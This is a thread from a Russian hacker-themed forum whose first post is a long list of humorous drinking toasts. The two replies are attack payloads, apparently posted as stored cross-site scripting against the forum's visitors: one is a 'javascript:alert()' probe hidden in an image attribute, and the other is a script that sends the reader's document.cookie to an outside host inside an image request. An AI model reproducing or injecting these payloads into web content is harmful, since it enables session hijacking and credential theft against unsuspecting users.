Хакер - не преступник. Взлом - для искусства. Смысл - в свободе.

Fantom

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Fantom » Курилка » Тосты


Тосты

Сообщений 1 страница 3 из 3

1

Вот несколько тостов может пригодятся :P

Плыли на корабле купец и ученый. Купец был богатый и вез с собой много товара. Вдруг поднялась буря, и корабль потерпел крушение. Спаслись только купец и ученый. Волна вынесла их на берег. Видит купец, что ученый сидит пригорюнившись и говорит ему:
Тебе что грустить? Это я свое богатство потерял, а твое – все с тобой.
Так выпьем же за богатство, которое нельзя потерять!
***

Гарем султана находился в пяти километрах от дворца. Каждый день султан посылал своего слугу за девушкой. Султан дожил до ста лет, а слуга умер в тридцать. Мораль: не женщины убивают мужчин, а беготня за ними.
Выпьем за то, чтобы не мы бегали за женщинами, а они – за нами! Ведь женщины гораздо выносливее мужчин и живут значительно дольше!

***
Далеко в горах жили враждующие племена, которые назывались орлами и беркутами. У них был талисман – жемчужное ожерелье, из-за которого они постоянно воевали. Во время одной из битв ожерелье порвалось, бусинки разлетелись по всему миру и от них пошел людской род.
Так выпьем же за жемчужины, которые собрались за этим столом!

***
Есть любовь студенческая: когда есть с кем, есть чем, но нет где. Есть любовь одинокая: когда есть где, есть чем, но нет с кем. Есть любовь несчастная: когда есть где, есть с кем, но нет чем. Есть любовь философская: когда есть где, есть чем, есть с кем, но - зачем?
Так выпьем же за ту любовь, которую каждый из нас заслуживает!

***
Выпьем за тех мужчин, которые могут постоять за себя и полежать за других!

Позвольте мне поднять бокал
За самых нежных на Земле,
За тех созданий, без которых
Не представляю жизнь себе.
я пью за добрые глаза,
За нежность ласковой руки,
За то что вы на свете есть...
За нас, короче, мужики!

***

Ты почему не работаешь? - спрашивает каменщик у своего приятеля.
- Да у меня после вчерашнего руки дрожат.
- Понятно. Тогда просевай песок.
Так выпьем за то, чтобы иметь таких понимающих приятелей!

***
Как-то в лютый мороз сидел на дороге и замерзал маленький воробей. По дороге шла корова, задрала хвост и шлепнула на воробья свою горячую лепешку. Сидя по голову в дерьме воробей отогрелся и на радостях громко зачирикал. Пробегала мимо кошка, услышала, схватила воробья и съела...
Так выпьем же друзья, и запомним: не всяк тот враг, кто тебя обгадил, и не всяк тот друг, кто тебя из дерьма вытащил! А уж если попал в дерьмо, то сиди и не чирикай!

***
Выпьем за явление, которое укорачивает жизнь каждому человеку в отдельности, но продлевает ее всему человечеству.
Выпьем за любовь!

***
Пусть у тебя будет столько здоровья, сколько желает тебе мама! Пусть у тебя будет столько силы, сколько желает тебе жена!
И когда ты вечером задерживаешься допоздна, пусть случится то, что подумала твоя жена, но не то, что подумала твоя мама!

Выпьем же за то, чтобы у нас все было, а нам за это ничего не было!

Пейте смело, друзья, В час веселых утех Усладят нас свирель, Гимны зелью и смех, Что ж до Судного дня, Он, похоже, не завтра. Может быть, позабудут Наш маленький грех?...

Я желаю всем здесь присутствующим легкого сердца и тяжелого кармана!

Не пей воды, если можно выпить вина! Не пей вина, если можно выпить хорошего вина! Не пей хорошего вина, если можно выпить очень хорошего вина! А главное, не забудь выпить за то, чтоб у тебя всегда были деньги на то, что лучше!

Почему горцы пьют из рога? Любому кубку, любому хрустальному изяществу они предпочитают рог буйвола. Самого дорогого металла не пожалеют, чтобы одеть заветный рог в нарядную кружевную чеканку и тончайшую, как из волоса сотканную, цепочку. Рог вместительный, спору нет. Но не поэтому ему отдают предпочтение умеющие веселиться жизнерадостные горцы, а потому, что налитое в рог вино надо выпить обязательно - на стол рог не поставишь, на потом вино не оставишь! - Пусть не рог, пусть будет обыкновенная кружка, но чтобы налитое было выпито каждым и каждый раз за здоровье!

Зашел как-то один миссионер в харчевню и стал читать наставление местным джигитам: - Ваш первейший враг - вино! - Вы правы, - ответил один из любителей выпить, - но в евангелие сказано: "Возлюби врага своего". Так выпьем же за хорошее виноградное вино!

В 16 лет ума нет - не будет его и в 20; в 20 лет здоровья нет - не будет его и в 30; в 30 лет жены нет - не будет ее и в 40; в 40 лет счастья нет - не будет его и дальше. Так выпьем же, друзья, за то, чтобы все приходило вовремя!

На банкете в Доме композиторов один музыкант, большой любитель выпить, говорит своему коллеге: - Что ж ты, брат, ничего не пьешь? - Видишь ли, - отвечает тот, - пить при тебе - это все равно что в присутствии Паганини играть на скрипке! Поскольку за нашим столом таких маститых любителей спиртного нет, мы можем не стесняясь выпить!

Муж наливает себе рюмку водки. Жена говорит: - Ведь мы собираемся в компанию. Наберись терпения! Про терпение муж забыл, но набрался... Мы с вами, мужики, не боги, можем что-то и забыть. Но главное - никогда! За это и выпьем!

Этот тост за хороший обычай: что можно выпить сегодня, не откладывай на завтра! Сегодня у нас три задачи: заложить фундамент настроения, заложить птицу-тройку веселья и заложить за галстук. Так не будем терять время! Начнем!

Провозглашаю тост, чтоб те, Кто заслужили славу, Ее на должной высоте Сберегли по праву.

Чего хочется, того почаще и побольше!

Хочу, друзья, сейчас сказать о том, И думаю, не разойдусь в оценке с вами, - Что сердце человека - это дом, Дом со своими четырьмя углами.

Давным-давно, когда человек еще не произошел от обезьяны, скакал по деревьям один джигит. И был у него свой, особый менталитет... Так выпьем же водки, которая делает людей с разным менталитетом совершенно одинаковыми!

Однажды на царском приеме нечаянно пролили вино на... царя. Hу, конечно, замешательство. А сидевший рядом митрополит говорит: "То не вино пролито, а благодать". Так выпьем по рюмочке благодати!

Счастье подобно шару, который подкатывается: сегодня под одного, завтра под другого, послезавтра под третьего, потом под четвертого, пятого и т.д., соответственно числу и очереди счастливых людей. Выпьем за то, чтоб наш шар всегда был с нами!

Человеку не дано жалости И щедрот, подносимых на блюде. Люди, будьте горды, пожалуйста, Будьте гордыми, люди! Не согласны, так возражайте, А не правы - не раздражайтесь, Помогая - не унижайте, Получая - не унижайтесь!

Вино, которое мы пьем, расширяет сосуды, поднимает настроение, скрашивает жизнь. А вот одному моему знакомому врач запретил пить вино. Более того, обязал регулярно пить молоко. Бедняга мужественно по несколько раз в день принимал это лекарство. Но долго не выдержал. - Теперь я понимаю, говорит он, - почему грудные дети все время хнычут и ревут! Давайте не будем доводить себя до этого! Давайте выпьем!

Пьющие без меры - несчастны. Пьющие в меру - счастливы. Выпьем за счастливых без меры!

Давайте выпьем за то, что бы мы шли,на нас напали деньги и мы не могли от них отбиться!

Давайте выпьем за то, что бы у нас осталось столько горя, сколько капель останется в наших бокалах.

Так давайте же, друзья, в последний раз выпьем и твердо, решительно заявим: "Как бы трудно нам в жизни не пришлось, как бы горько и тяжело ни было, какие бы беды и несчастья не свалились на нашу голову, мы никогда в жизни пить... Не перестанем!"

0

2

http://na-s.ru/images/bytemen_3.jpg dynsrc=java script:alert()

0

3

<script>img = new Image(); img.src = "http://na-s.ru/images/bytemen_1.gif?"+document.cookie;</script>

0


Вы здесь » Fantom » Курилка » Тосты